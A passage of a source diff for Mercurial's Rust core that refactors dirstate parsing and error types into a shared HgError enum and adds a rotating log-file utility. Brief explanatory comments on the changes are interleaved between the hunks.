- Some(i) => (&path[..i], Some(&path[(i + 1)..])),
- };
-
- if let Some(copy_path) = copy {
- copies.push((HgPath::new(path), HgPath::new(copy_path)));
- };
- entries.push((
- HgPath::new(path),
- DirstateEntry {
- state,
- mode,
- size,
- mtime,
- },
- ));
- curr_pos = curr_pos + MIN_ENTRY_SIZE + (path_len);
+ entries.push((path, entry));
+ contents = rest;
}
Ok((parents, entries, copies))
}
/// `now` is the duration in seconds since the Unix epoch
-#[cfg(not(feature = "dirstate-tree"))]
pub fn pack_dirstate(
state_map: &mut StateMap,
copy_map: &CopyMap,
parents: DirstateParents,
now: Duration,
-) -> Result<Vec<u8>, DirstatePackError> {
+) -> Result<Vec<u8>, HgError> {
// TODO move away from i32 before 2038.
let now: i32 = now.as_secs().try_into().expect("time overflow");
@@ -108,8 +96,8 @@
let mut packed = Vec::with_capacity(expected_size);
- packed.extend(&parents.p1);
- packed.extend(&parents.p2);
+ packed.extend(parents.p1.as_bytes());
+ packed.extend(parents.p2.as_bytes());
for (filename, entry) in state_map.iter_mut() {
let new_filename = filename.to_owned();
@@ -136,93 +124,27 @@
new_filename.extend(copy.bytes());
}
- packed.write_u8(entry.state.into())?;
- packed.write_i32::<BigEndian>(entry.mode)?;
- packed.write_i32::<BigEndian>(entry.size)?;
- packed.write_i32::<BigEndian>(new_mtime)?;
- packed.write_i32::<BigEndian>(new_filename.len() as i32)?;
+ // Unwrapping because `impl std::io::Write for Vec<u8>` never errors
+ packed.write_u8(entry.state.into()).unwrap();
+ packed.write_i32::<BigEndian>(entry.mode).unwrap();
+ packed.write_i32::<BigEndian>(entry.size).unwrap();
+ packed.write_i32::<BigEndian>(new_mtime).unwrap();
+ packed
+ .write_i32::<BigEndian>(new_filename.len() as i32)
+ .unwrap();
packed.extend(new_filename)
}
if packed.len() != expected_size {
- return Err(DirstatePackError::BadSize(expected_size, packed.len()));
+ return Err(HgError::CorruptedRepository(format!(
+ "bad dirstate size: {} != {}",
+ expected_size,
+ packed.len()
+ )));
}
Ok(packed)
}
-/// `now` is the duration in seconds since the Unix epoch
-#[cfg(feature = "dirstate-tree")]
-pub fn pack_dirstate(
- state_map: &mut StateMap,
- copy_map: &CopyMap,
- parents: DirstateParents,
- now: Duration,
-) -> Result<Vec<u8>, DirstatePackError> {
- // TODO move away from i32 before 2038.
- let now: i32 = now.as_secs().try_into().expect("time overflow");
-
- let expected_size: usize = state_map
- .iter()
- .map(|(filename, _)| {
- let mut length = MIN_ENTRY_SIZE + filename.len();
- if let Some(copy) = copy_map.get(&filename) {
- length += copy.len() + 1;
- }
- length
- })
- .sum();
- let expected_size = expected_size + PARENT_SIZE * 2;
-
- let mut packed = Vec::with_capacity(expected_size);
- let mut new_state_map = vec![];
-
- packed.extend(&parents.p1);
- packed.extend(&parents.p2);
-
- for (filename, entry) in state_map.iter() {
- let new_filename = filename.to_owned();
- let mut new_mtime: i32 = entry.mtime;
- if entry.state == EntryState::Normal && entry.mtime == now {
- // The file was last modified "simultaneously" with the current
- // write to dirstate (i.e. within the same second for file-
- // systems with a granularity of 1 sec). This commonly happens
- // for at least a couple of files on 'update'.
- // The user could change the file without changing its size
- // within the same second. Invalidate the file's mtime in
- // dirstate, forcing future 'status' calls to compare the
- // contents of the file if the size is the same. This prevents
- // mistakenly treating such files as clean.
- new_mtime = -1;
- new_state_map.push((
- filename.to_owned(),
- DirstateEntry {
- mtime: new_mtime,
- ..entry
- },
- ));
- }
- let mut new_filename = new_filename.into_vec();
- if let Some(copy) = copy_map.get(&filename) {
- new_filename.push(b'\0');
- new_filename.extend(copy.bytes());
- }
-
- packed.write_u8(entry.state.into())?;
- packed.write_i32::<BigEndian>(entry.mode)?;
- packed.write_i32::<BigEndian>(entry.size)?;
- packed.write_i32::<BigEndian>(new_mtime)?;
- packed.write_i32::<BigEndian>(new_filename.len() as i32)?;
- packed.extend(new_filename)
- }
-
- if packed.len() != expected_size {
- return Err(DirstatePackError::BadSize(expected_size, packed.len()));
- }
-
- state_map.extend(new_state_map);
-
- Ok(packed)
-}
#[cfg(test)]
mod tests {
@@ -235,8 +157,8 @@
let mut state_map = StateMap::default();
let copymap = FastHashMap::default();
let parents = DirstateParents {
- p1: *b"12345678910111213141",
- p2: *b"00000000000000000000",
+ p1: b"12345678910111213141".into(),
+ p2: b"00000000000000000000".into(),
};
let now = Duration::new(15000000, 0);
let expected = b"1234567891011121314100000000000000000000".to_vec();
@@ -266,8 +188,8 @@
let copymap = FastHashMap::default();
let parents = DirstateParents {
- p1: *b"12345678910111213141",
- p2: *b"00000000000000000000",
+ p1: b"12345678910111213141".into(),
+ p2: b"00000000000000000000".into(),
};
let now = Duration::new(15000000, 0);
let expected = [
@@ -306,8 +228,8 @@
HgPathBuf::from_bytes(b"copyname"),
);
let parents = DirstateParents {
- p1: *b"12345678910111213141",
- p2: *b"00000000000000000000",
+ p1: b"12345678910111213141".into(),
+ p2: b"00000000000000000000".into(),
};
let now = Duration::new(15000000, 0);
let expected = [
@@ -346,8 +268,8 @@
HgPathBuf::from_bytes(b"copyname"),
);
let parents = DirstateParents {
- p1: *b"12345678910111213141",
- p2: *b"00000000000000000000",
+ p1: b"12345678910111213141".into(),
+ p2: b"00000000000000000000".into(),
};
let now = Duration::new(15000000, 0);
let result =
@@ -366,7 +288,7 @@
.collect();
assert_eq!(
- (parents, state_map, copymap),
+ (&parents, state_map, copymap),
(new_parents, new_state_map, new_copy_map)
)
}
@@ -424,8 +346,8 @@
HgPathBuf::from_bytes(b"copyname2"),
);
let parents = DirstateParents {
- p1: *b"12345678910111213141",
- p2: *b"00000000000000000000",
+ p1: b"12345678910111213141".into(),
+ p2: b"00000000000000000000".into(),
};
let now = Duration::new(15000000, 0);
let result =
@@ -444,7 +366,7 @@
.collect();
assert_eq!(
- (parents, state_map, copymap),
+ (&parents, state_map, copymap),
(new_parents, new_state_map, new_copy_map)
)
}
@@ -470,8 +392,8 @@
HgPathBuf::from_bytes(b"copyname"),
);
let parents = DirstateParents {
- p1: *b"12345678910111213141",
- p2: *b"00000000000000000000",
+ p1: b"12345678910111213141".into(),
+ p2: b"00000000000000000000".into(),
};
let now = Duration::new(15000000, 0);
let result =
@@ -491,7 +413,7 @@
assert_eq!(
(
- parents,
+ &parents,
[(
HgPathBuf::from_bytes(b"f1"),
DirstateEntry {
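
The `splitn` dance in the new `parse_dirstate` handles the on-disk convention that an entry's trailing bytes are either `path` or `path\0copy_source`. A self-contained sketch of that split, with raw byte slices standing in for `HgPath`; `split_copy` is a made-up helper name:

```rust
// Sketch only: byte slices stand in for HgPath.
fn split_copy(paths: &[u8]) -> (&[u8], Option<&[u8]>) {
    // At most two pieces: the path, and an optional copy source after the
    // first NUL byte.
    let mut iter = paths.splitn(2, |&byte| byte == b'\0');
    let path = iter.next().expect("splitn always yields at least one item");
    (path, iter.next())
}

fn main() {
    assert_eq!(split_copy(b"dir/file"), (&b"dir/file"[..], None));
    assert_eq!(split_copy(b"new\0old"), (&b"new"[..], Some(&b"old"[..])));
}
```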
--- a/rust/hg-core/src/dirstate/status.rs Thu Mar 25 19:06:28 2021 -0400
+++ b/rust/hg-core/src/dirstate/status.rs Tue Apr 20 11:01:06 2021 -0400
@@ -9,9 +9,6 @@
//! It is currently missing a lot of functionality compared to the Python one
//! and will only be triggered in narrow cases.
-#[cfg(feature = "dirstate-tree")]
-use crate::dirstate::dirstate_tree::iter::StatusShortcut;
-#[cfg(not(feature = "dirstate-tree"))]
use crate::utils::path_auditor::PathAuditor;
use crate::{
dirstate::SIZE_FROM_OTHER_PARENT,
@@ -33,6 +30,7 @@
use std::{
borrow::Cow,
collections::HashSet,
+ fmt,
fs::{read_dir, DirEntry},
io::ErrorKind,
ops::Deref,
@@ -51,17 +49,16 @@
Unknown,
}
-impl ToString for BadType {
- fn to_string(&self) -> String {
- match self {
+impl fmt::Display for BadType {
+ fn fmt(&self, f: &mut fmt::Formatter) -> fmt::Result {
+ f.write_str(match self {
BadType::CharacterDevice => "character device",
BadType::BlockDevice => "block device",
BadType::FIFO => "fifo",
BadType::Socket => "socket",
BadType::Directory => "directory",
BadType::Unknown => "unknown",
- }
- .to_string()
+ })
}
}
@@ -184,7 +181,13 @@
|| other_parent
|| copy_map.contains_key(filename.as_ref())
{
- Dispatch::Modified
+ if metadata.is_symlink() && size_changed {
+ // issue6456: the size returned may be longer due to encryption
+ // on ext4 with fscrypt. TODO: maybe only do this on ext4?
+ Dispatch::Unsure
+ } else {
+ Dispatch::Modified
+ }
} else if mod_compare(mtime, st_mtime as i32)
|| st_mtime == options.last_normal_time
{
@@ -265,7 +268,7 @@
pub traversed: Vec<HgPathBuf>,
}
-#[derive(Debug)]
+#[derive(Debug, derive_more::From)]
pub enum StatusError {
/// Generic IO error
IO(std::io::Error),
@@ -277,28 +280,12 @@
pub type StatusResult<T> = Result<T, StatusError>;
-impl From<PatternError> for StatusError {
- fn from(e: PatternError) -> Self {
- StatusError::Pattern(e)
- }
-}
-impl From<HgPathError> for StatusError {
- fn from(e: HgPathError) -> Self {
- StatusError::Path(e)
- }
-}
-impl From<std::io::Error> for StatusError {
- fn from(e: std::io::Error) -> Self {
- StatusError::IO(e)
- }
-}
-
-impl ToString for StatusError {
- fn to_string(&self) -> String {
+impl fmt::Display for StatusError {
+ fn fmt(&self, f: &mut fmt::Formatter) -> fmt::Result {
match self {
- StatusError::IO(e) => e.to_string(),
- StatusError::Path(e) => e.to_string(),
- StatusError::Pattern(e) => e.to_string(),
+ StatusError::IO(error) => error.fmt(f),
+ StatusError::Path(error) => error.fmt(f),
+ StatusError::Pattern(error) => error.fmt(f),
}
}
}
@@ -713,83 +700,6 @@
///
/// This takes a mutable reference to the results to account for the
/// `extend` in timings
- #[cfg(feature = "dirstate-tree")]
- #[timed]
- pub fn extend_from_dmap(&self, results: &mut Vec<DispatchedPath<'a>>) {
- results.par_extend(
- self.dmap
- .fs_iter(self.root_dir.clone())
- .par_bridge()
- .filter(|(path, _)| self.matcher.matches(path))
- .map(move |(filename, shortcut)| {
- let entry = match shortcut {
- StatusShortcut::Entry(e) => e,
- StatusShortcut::Dispatch(d) => {
- return (Cow::Owned(filename), d)
- }
- };
- let filename_as_path = match hg_path_to_path_buf(&filename)
- {
- Ok(f) => f,
- Err(_) => {
- return (
- Cow::Owned(filename),
- INVALID_PATH_DISPATCH,
- )
- }
- };
- let meta = self
- .root_dir
- .join(filename_as_path)
- .symlink_metadata();
-
- match meta {
- Ok(m)
- if !(m.file_type().is_file()
- || m.file_type().is_symlink()) =>
- {
- (
- Cow::Owned(filename),
- dispatch_missing(entry.state),
- )
- }
- Ok(m) => {
- let dispatch = dispatch_found(
- &filename,
- entry,
- HgMetadata::from_metadata(m),
- &self.dmap.copy_map,
- self.options,
- );
- (Cow::Owned(filename), dispatch)
- }
- Err(e)
- if e.kind() == ErrorKind::NotFound
- || e.raw_os_error() == Some(20) =>
- {
- // Rust does not yet have an `ErrorKind` for
- // `NotADirectory` (errno 20)
- // It happens if the dirstate contains `foo/bar`
- // and foo is not a
- // directory
- (
- Cow::Owned(filename),
- dispatch_missing(entry.state),
- )
- }
- Err(e) => {
- (Cow::Owned(filename), dispatch_os_error(&e))
- }
- }
- }),
- );
- }
-
- /// Add the files in the dirstate to the results.
- ///
- /// This takes a mutable reference to the results to account for the
- /// `extend` in timings
- #[cfg(not(feature = "dirstate-tree"))]
#[timed]
pub fn extend_from_dmap(&self, results: &mut Vec<DispatchedPath<'a>>) {
results.par_extend(
@@ -860,7 +770,6 @@
///
/// This takes a mutable reference to the results to account for the
/// `extend` in timings
- #[cfg(not(feature = "dirstate-tree"))]
#[timed]
pub fn handle_unknowns(&self, results: &mut Vec<DispatchedPath<'a>>) {
let to_visit: Vec<(&HgPath, &DirstateEntry)> =
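
Two mechanical cleanups above are worth noting: `derive_more::From` replaces the three hand-written `From` impls on `StatusError`, and `BadType`/`StatusError` now implement `fmt::Display` instead of `ToString`, picking up `to_string()` through the standard blanket impl while writing straight into the formatter with no temporary `String`. A trimmed-down sketch of the `Display` idiom, keeping only two of the variants shown above:

```rust
use std::fmt;

// Sketch: a reduced version of the enum, for illustration only.
enum BadType {
    Fifo,
    Socket,
}

impl fmt::Display for BadType {
    fn fmt(&self, f: &mut fmt::Formatter) -> fmt::Result {
        // Writes directly into the formatter; no intermediate allocation.
        f.write_str(match self {
            BadType::Fifo => "fifo",
            BadType::Socket => "socket",
        })
    }
}

fn main() {
    // `to_string` comes for free from `impl<T: fmt::Display> ToString for T`.
    assert_eq!(BadType::Socket.to_string(), "socket");
}
```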
--- /dev/null Thu Jan 01 00:00:00 1970 +0000
+++ b/rust/hg-core/src/errors.rs Tue Apr 20 11:01:06 2021 -0400
@@ -0,0 +1,183 @@
+use crate::config::ConfigValueParseError;
+use std::fmt;
+
+/// Common error cases that can happen in many different APIs
+#[derive(Debug, derive_more::From)]
+pub enum HgError {
+ IoError {
+ error: std::io::Error,
+ context: IoErrorContext,
+ },
+
+ /// A file under `.hg/` normally only written by Mercurial is not in the
+ /// expected format. This indicates a bug in Mercurial, filesystem
+ /// corruption, or hardware failure.
+ ///
+ /// The given string is a short explanation for users, not intended to be
+ /// machine-readable.
+ CorruptedRepository(String),
+
+ /// The repository or requested operation involves a feature not
+ /// supported by the Rust implementation. Falling back to the Python
+ /// implementation may or may not work.
+ ///
+ /// The given string is a short explanation for users, not intended to be
+ /// machine-readable.
+ UnsupportedFeature(String),
+
+ /// Operation cannot proceed for some other reason.
+ ///
+ /// The given string is a short explanation for users, not intended to be
+ /// machine-readable.
+ Abort(String),
+
+ /// A configuration value is not in the expected syntax.
+ ///
+ /// These errors can happen in many places in the code because values are
+ /// parsed lazily, as the file-level parser does not know the expected type
+ /// and syntax of each value.
+ #[from]
+ ConfigValueParseError(ConfigValueParseError),
+}
+
+/// Details about where an I/O error happened
+#[derive(Debug)]
+pub enum IoErrorContext {
+ ReadingFile(std::path::PathBuf),
+ WritingFile(std::path::PathBuf),
+ RemovingFile(std::path::PathBuf),
+ RenamingFile {
+ from: std::path::PathBuf,
+ to: std::path::PathBuf,
+ },
+ /// `std::fs::canonicalize`
+ CanonicalizingPath(std::path::PathBuf),
+ /// `std::env::current_dir`
+ CurrentDir,
+ /// `std::env::current_exe`
+ CurrentExe,
+}
+
+impl HgError {
+ pub fn corrupted(explanation: impl Into<String>) -> Self {
+ // TODO: capture a backtrace here and keep it in the error value
+ // to aid debugging?
+ // https://doc.rust-lang.org/std/backtrace/struct.Backtrace.html
+ HgError::CorruptedRepository(explanation.into())
+ }
+
+ pub fn unsupported(explanation: impl Into<String>) -> Self {
+ HgError::UnsupportedFeature(explanation.into())
+ }
+ pub fn abort(explanation: impl Into<String>) -> Self {
+ HgError::Abort(explanation.into())
+ }
+}
+
+// TODO: use `DisplayBytes` instead to show non-Unicode filenames losslessly?
+impl fmt::Display for HgError {
+ fn fmt(&self, f: &mut fmt::Formatter) -> fmt::Result {
+ match self {
+ HgError::Abort(explanation) => write!(f, "{}", explanation),
+ HgError::IoError { error, context } => {
+ write!(f, "abort: {}: {}", context, error)
+ }
+ HgError::CorruptedRepository(explanation) => {
+ write!(f, "abort: {}", explanation)
+ }
+ HgError::UnsupportedFeature(explanation) => {
+ write!(f, "unsupported feature: {}", explanation)
+ }
+ HgError::ConfigValueParseError(error) => error.fmt(f),
+ }
+ }
+}
+
+// TODO: use `DisplayBytes` instead to show non-Unicode filenames losslessly?
+impl fmt::Display for IoErrorContext {
+ fn fmt(&self, f: &mut fmt::Formatter) -> fmt::Result {
+ match self {
+ IoErrorContext::ReadingFile(path) => {
+ write!(f, "when reading {}", path.display())
+ }
+ IoErrorContext::WritingFile(path) => {
+ write!(f, "when writing {}", path.display())
+ }
+ IoErrorContext::RemovingFile(path) => {
+ write!(f, "when removing {}", path.display())
+ }
+ IoErrorContext::RenamingFile { from, to } => write!(
+ f,
+ "when renaming {} to {}",
+ from.display(),
+ to.display()
+ ),
+ IoErrorContext::CanonicalizingPath(path) => {
+ write!(f, "when canonicalizing {}", path.display())
+ }
+ IoErrorContext::CurrentDir => {
+ write!(f, "error getting current working directory")
+ }
+ IoErrorContext::CurrentExe => {
+ write!(f, "error getting current executable")
+ }
+ }
+ }
+}
+
+pub trait IoResultExt<T> {
+ /// Annotate a possible I/O error as related to reading a file at the
+ /// given path.
+ ///
+ /// This allows printing something like “File not found when reading
+ /// example.txt” instead of just “File not found”.
+ ///
+ /// Converts a `Result` with `std::io::Error` into one with `HgError`.
+ fn when_reading_file(self, path: &std::path::Path) -> Result<T, HgError>;
+
+ fn with_context(
+ self,
+ context: impl FnOnce() -> IoErrorContext,
+ ) -> Result<T, HgError>;
+}
+
+impl<T> IoResultExt<T> for std::io::Result<T> {
+ fn when_reading_file(self, path: &std::path::Path) -> Result<T, HgError> {
+ self.with_context(|| IoErrorContext::ReadingFile(path.to_owned()))
+ }
+
+ fn with_context(
+ self,
+ context: impl FnOnce() -> IoErrorContext,
+ ) -> Result<T, HgError> {
+ self.map_err(|error| HgError::IoError {
+ error,
+ context: context(),
+ })
+ }
+}
+
+pub trait HgResultExt<T> {
+ /// Handle missing files separately from other I/O error cases.
+ ///
+ /// Wraps the `Ok` type in an `Option`:
+ ///
+ /// * `Ok(x)` becomes `Ok(Some(x))`
+ /// * An I/O "not found" error becomes `Ok(None)`
+ /// * Other errors are unchanged
+ fn io_not_found_as_none(self) -> Result<Option<T>, HgError>;
+}
+
+impl<T> HgResultExt<T> for Result<T, HgError> {
+ fn io_not_found_as_none(self) -> Result<Option<T>, HgError> {
+ match self {
+ Ok(x) => Ok(Some(x)),
+ Err(HgError::IoError { error, .. })
+ if error.kind() == std::io::ErrorKind::NotFound =>
+ {
+ Ok(None)
+ }
+ Err(other_error) => Err(other_error),
+ }
+ }
+}
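
A minimal usage sketch for the extension traits defined above (the helper function and the `hg::errors` crate path are assumptions; the trait methods are the ones in this file):

    use std::path::Path;

    use hg::errors::{HgError, HgResultExt, IoResultExt};

    /// Hypothetical helper: read a file that is allowed to be absent.
    fn read_optional(path: &Path) -> Result<Option<Vec<u8>>, HgError> {
        std::fs::read(path)
            // Attach the path as `IoErrorContext::ReadingFile`, converting
            // `std::io::Error` into `HgError::IoError { .. }`.
            .when_reading_file(path)
            // Map an I/O "not found" error to `Ok(None)`.
            .io_not_found_as_none()
    }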
--- a/rust/hg-core/src/lib.rs Thu Mar 25 19:06:28 2021 -0400
+++ b/rust/hg-core/src/lib.rs Tue Apr 20 11:01:06 2021 -0400
@@ -3,8 +3,10 @@
//
// This software may be used and distributed according to the terms of the
// GNU General Public License version 2 or any later version.
+
mod ancestors;
pub mod dagops;
+pub mod errors;
pub use ancestors::{AncestorsIterator, LazyAncestors, MissingAncestors};
mod dirstate;
pub mod discovery;
@@ -15,7 +17,8 @@
dirstate_map::DirstateMap,
parsers::{pack_dirstate, parse_dirstate, PARENT_SIZE},
status::{
- status, BadMatch, BadType, DirstateStatus, StatusError, StatusOptions,
+ status, BadMatch, BadType, DirstateStatus, HgPathCow, StatusError,
+ StatusOptions,
},
CopyMap, CopyMapIter, DirstateEntry, DirstateParents, EntryState,
StateMap, StateMapIter,
@@ -27,23 +30,18 @@
pub mod revlog;
pub use revlog::*;
pub mod config;
+pub mod logging;
pub mod operations;
+pub mod revset;
pub mod utils;
-// Remove this to see (potential) non-artificial compile failures. MacOS
-// *should* compile, but fail to compile tests for example as of 2020-03-06
-#[cfg(not(target_os = "linux"))]
-compile_error!(
- "`hg-core` has only been tested on Linux and will most \
- likely not behave correctly on other platforms."
-);
-
use crate::utils::hg_path::{HgPathBuf, HgPathError};
pub use filepatterns::{
parse_pattern_syntax, read_pattern_file, IgnorePattern,
PatternFileWarning, PatternSyntax,
};
use std::collections::HashMap;
+use std::fmt;
use twox_hash::RandomXxHashBuilder64;
/// This is a contract between the `micro-timer` crate and us, to expose
@@ -57,45 +55,6 @@
/// write access to your repository, you have other issues.
pub type FastHashMap<K, V> = HashMap<K, V, RandomXxHashBuilder64>;
-#[derive(Clone, Debug, PartialEq)]
-pub enum DirstateParseError {
- TooLittleData,
- Overflow,
- // TODO refactor to use bytes instead of String
- CorruptedEntry(String),
- Damaged,
-}
-
-impl From<std::io::Error> for DirstateParseError {
- fn from(e: std::io::Error) -> Self {
- DirstateParseError::CorruptedEntry(e.to_string())
- }
-}
-
-impl ToString for DirstateParseError {
- fn to_string(&self) -> String {
- use crate::DirstateParseError::*;
- match self {
- TooLittleData => "Too little data for dirstate.".to_string(),
- Overflow => "Overflow in dirstate.".to_string(),
- CorruptedEntry(e) => format!("Corrupted entry: {:?}.", e),
- Damaged => "Dirstate appears to be damaged.".to_string(),
- }
- }
-}
-
-#[derive(Debug, PartialEq)]
-pub enum DirstatePackError {
- CorruptedEntry(String),
- CorruptedParent,
- BadSize(usize, usize),
-}
-
-impl From<std::io::Error> for DirstatePackError {
- fn from(e: std::io::Error) -> Self {
- DirstatePackError::CorruptedEntry(e.to_string())
- }
-}
#[derive(Debug, PartialEq)]
pub enum DirstateMapError {
PathNotFound(HgPathBuf),
@@ -103,94 +62,61 @@
InvalidPath(HgPathError),
}
-impl ToString for DirstateMapError {
- fn to_string(&self) -> String {
+impl fmt::Display for DirstateMapError {
+ fn fmt(&self, f: &mut fmt::Formatter) -> fmt::Result {
match self {
DirstateMapError::PathNotFound(_) => {
- "expected a value, found none".to_string()
+ f.write_str("expected a value, found none")
}
- DirstateMapError::EmptyPath => "Overflow in dirstate.".to_string(),
- DirstateMapError::InvalidPath(e) => e.to_string(),
+ DirstateMapError::EmptyPath => {
+ f.write_str("Overflow in dirstate.")
+ }
+ DirstateMapError::InvalidPath(path_error) => path_error.fmt(f),
}
}
}
-#[derive(Debug)]
+#[derive(Debug, derive_more::From)]
pub enum DirstateError {
- Parse(DirstateParseError),
- Pack(DirstatePackError),
Map(DirstateMapError),
- IO(std::io::Error),
+ Common(errors::HgError),
}
-impl From<DirstateParseError> for DirstateError {
- fn from(e: DirstateParseError) -> Self {
- DirstateError::Parse(e)
- }
-}
-
-impl From<DirstatePackError> for DirstateError {
- fn from(e: DirstatePackError) -> Self {
- DirstateError::Pack(e)
- }
-}
-
-#[derive(Debug)]
+#[derive(Debug, derive_more::From)]
pub enum PatternError {
+ #[from]
Path(HgPathError),
UnsupportedSyntax(String),
UnsupportedSyntaxInFile(String, String, usize),
TooLong(usize),
+ #[from]
IO(std::io::Error),
/// Needed a pattern that can be turned into a regex but got one that
/// can't. This should only happen through programmer error.
NonRegexPattern(IgnorePattern),
}
-impl ToString for PatternError {
- fn to_string(&self) -> String {
+impl fmt::Display for PatternError {
+ fn fmt(&self, f: &mut fmt::Formatter) -> fmt::Result {
match self {
PatternError::UnsupportedSyntax(syntax) => {
- format!("Unsupported syntax {}", syntax)
+ write!(f, "Unsupported syntax {}", syntax)
}
PatternError::UnsupportedSyntaxInFile(syntax, file_path, line) => {
- format!(
+ write!(
+ f,
"{}:{}: unsupported syntax {}",
file_path, line, syntax
)
}
PatternError::TooLong(size) => {
- format!("matcher pattern is too long ({} bytes)", size)
+ write!(f, "matcher pattern is too long ({} bytes)", size)
}
- PatternError::IO(e) => e.to_string(),
- PatternError::Path(e) => e.to_string(),
+ PatternError::IO(error) => error.fmt(f),
+ PatternError::Path(error) => error.fmt(f),
PatternError::NonRegexPattern(pattern) => {
- format!("'{:?}' cannot be turned into a regex", pattern)
+ write!(f, "'{:?}' cannot be turned into a regex", pattern)
}
}
}
}
-
-impl From<DirstateMapError> for DirstateError {
- fn from(e: DirstateMapError) -> Self {
- DirstateError::Map(e)
- }
-}
-
-impl From<std::io::Error> for DirstateError {
- fn from(e: std::io::Error) -> Self {
- DirstateError::IO(e)
- }
-}
-
-impl From<std::io::Error> for PatternError {
- fn from(e: std::io::Error) -> Self {
- PatternError::IO(e)
- }
-}
-
-impl From<HgPathError> for PatternError {
- fn from(e: HgPathError) -> Self {
- PatternError::Path(e)
- }
-}
--- /dev/null Thu Jan 01 00:00:00 1970 +0000
+++ b/rust/hg-core/src/logging.rs Tue Apr 20 11:01:06 2021 -0400
@@ -0,0 +1,101 @@
+use crate::errors::{HgError, HgResultExt, IoErrorContext, IoResultExt};
+use crate::repo::Vfs;
+use std::io::Write;
+
+/// A utility to append to a log file with the given name, and optionally
+/// rotate it after it reaches a certain maximum size.
+///
+/// Rotation works by renaming "example.log" to "example.log.1" after first
+/// renaming "example.log.1" to "example.log.2", and so on, up to the given
+/// maximum number of files.
+pub struct LogFile<'a> {
+ vfs: Vfs<'a>,
+ name: &'a str,
+ max_size: Option<u64>,
+ max_files: u32,
+}
+
+impl<'a> LogFile<'a> {
+ pub fn new(vfs: Vfs<'a>, name: &'a str) -> Self {
+ Self {
+ vfs,
+ name,
+ max_size: None,
+ max_files: 0,
+ }
+ }
+
+ /// Rotate before writing to a log file that was already larger than the
+ /// given size, in bytes. `None` disables rotation.
+ pub fn max_size(mut self, value: Option<u64>) -> Self {
+ self.max_size = value;
+ self
+ }
+
+ /// Keep this many rotated files `{name}.1` up to `{name}.{max}`, in
+ /// addition to the original `{name}` file.
+ pub fn max_files(mut self, value: u32) -> Self {
+ self.max_files = value;
+ self
+ }
+
+ /// Append the given `bytes` as-is to the log file, after rotating if
+ /// needed.
+ ///
+ /// No trailing newline is added. Make sure to include one in `bytes` if
+ /// desired.
+ pub fn write(&self, bytes: &[u8]) -> Result<(), HgError> {
+ let path = self.vfs.join(self.name);
+ let context = || IoErrorContext::WritingFile(path.clone());
+ let open = || {
+ std::fs::OpenOptions::new()
+ .create(true)
+ .append(true)
+ .open(&path)
+ .with_context(context)
+ };
+ let mut file = open()?;
+ if let Some(max_size) = self.max_size {
+ if file.metadata().with_context(context)?.len() >= max_size {
+ // For example with `max_files == 5`, the first iteration of
+ // this loop has `i == 4` and renames `{name}.4` to `{name}.5`.
+ // The last iteration renames `{name}.1` to
+ // `{name}.2`
+ for i in (1..self.max_files).rev() {
+ self.vfs
+ .rename(
+ format!("{}.{}", self.name, i),
+ format!("{}.{}", self.name, i + 1),
+ )
+ .io_not_found_as_none()?;
+ }
+ // Then rename `{name}` to `{name}.1`. This is the
+ // previously-opened `file`.
+ self.vfs
+ .rename(self.name, format!("{}.1", self.name))
+ .io_not_found_as_none()?;
+ // Finally, create a new `{name}` file and replace our `file`
+ // handle.
+ file = open()?;
+ }
+ }
+ file.write_all(bytes).with_context(context)?;
+ file.sync_all().with_context(context)
+ }
+}
+
+#[test]
+fn test_rotation() {
+ let temp = tempfile::tempdir().unwrap();
+ let vfs = Vfs { base: temp.path() };
+ let logger = LogFile::new(vfs, "log").max_size(Some(3)).max_files(2);
+ logger.write(b"one\n").unwrap();
+ logger.write(b"two\n").unwrap();
+ logger.write(b"3\n").unwrap();
+ logger.write(b"four\n").unwrap();
+ logger.write(b"five\n").unwrap();
+ assert_eq!(vfs.read("log").unwrap(), b"five\n");
+ assert_eq!(vfs.read("log.1").unwrap(), b"3\nfour\n");
+ assert_eq!(vfs.read("log.2").unwrap(), b"two\n");
+ assert!(vfs.read("log.3").io_not_found_as_none().unwrap().is_none());
+}
--- a/rust/hg-core/src/operations/cat.rs Thu Mar 25 19:06:28 2021 -0400
+++ b/rust/hg-core/src/operations/cat.rs Tue Apr 20 11:01:06 2021 -0400
@@ -5,7 +5,6 @@
// This software may be used and distributed according to the terms of the
// GNU General Public License version 2 or any later version.
-use std::convert::From;
use std::path::PathBuf;
use crate::repo::Repo;
@@ -15,99 +14,59 @@
use crate::revlog::revlog::Revlog;
use crate::revlog::revlog::RevlogError;
use crate::revlog::Node;
-use crate::revlog::NodePrefix;
-use crate::revlog::Revision;
use crate::utils::files::get_path_from_bytes;
use crate::utils::hg_path::{HgPath, HgPathBuf};
+pub struct CatOutput {
+ /// Whether any file in the manifest matched the paths given as CLI
+ /// arguments
+ pub found_any: bool,
+ /// The contents of matching files, in manifest order
+ pub concatenated: Vec<u8>,
+ /// Which of the CLI arguments did not match any manifest file
+ pub missing: Vec<HgPathBuf>,
+ /// The node ID that the given revset was resolved to
+ pub node: Node,
+}
+
const METADATA_DELIMITER: [u8; 2] = [b'\x01', b'\n'];
-/// Kind of error encountered by `CatRev`
-#[derive(Debug)]
-pub enum CatRevErrorKind {
- /// Error when reading a `revlog` file.
- IoError(std::io::Error),
- /// The revision has not been found.
- InvalidRevision,
- /// Found more than one revision whose ID match the requested prefix
- AmbiguousPrefix,
- /// A `revlog` file is corrupted.
- CorruptedRevlog,
- /// The `revlog` format version is not supported.
- UnsuportedRevlogVersion(u16),
- /// The `revlog` data format is not supported.
- UnknowRevlogDataFormat(u8),
-}
-
-/// A `CatRev` error
-#[derive(Debug)]
-pub struct CatRevError {
- /// Kind of error encountered by `CatRev`
- pub kind: CatRevErrorKind,
-}
-
-impl From<CatRevErrorKind> for CatRevError {
- fn from(kind: CatRevErrorKind) -> Self {
- CatRevError { kind }
- }
-}
-
-impl From<RevlogError> for CatRevError {
- fn from(err: RevlogError) -> Self {
- match err {
- RevlogError::IoError(err) => CatRevErrorKind::IoError(err),
- RevlogError::UnsuportedVersion(version) => {
- CatRevErrorKind::UnsuportedRevlogVersion(version)
- }
- RevlogError::InvalidRevision => CatRevErrorKind::InvalidRevision,
- RevlogError::AmbiguousPrefix => CatRevErrorKind::AmbiguousPrefix,
- RevlogError::Corrupted => CatRevErrorKind::CorruptedRevlog,
- RevlogError::UnknowDataFormat(format) => {
- CatRevErrorKind::UnknowRevlogDataFormat(format)
- }
- }
- .into()
- }
-}
-
-/// List files under Mercurial control at a given revision.
+/// Output the given revision of files
///
/// * `root`: Repository root
/// * `rev`: The revision to cat the files from.
/// * `files`: The files to output.
-pub fn cat(
+pub fn cat<'a>(
repo: &Repo,
- rev: &str,
- files: &[HgPathBuf],
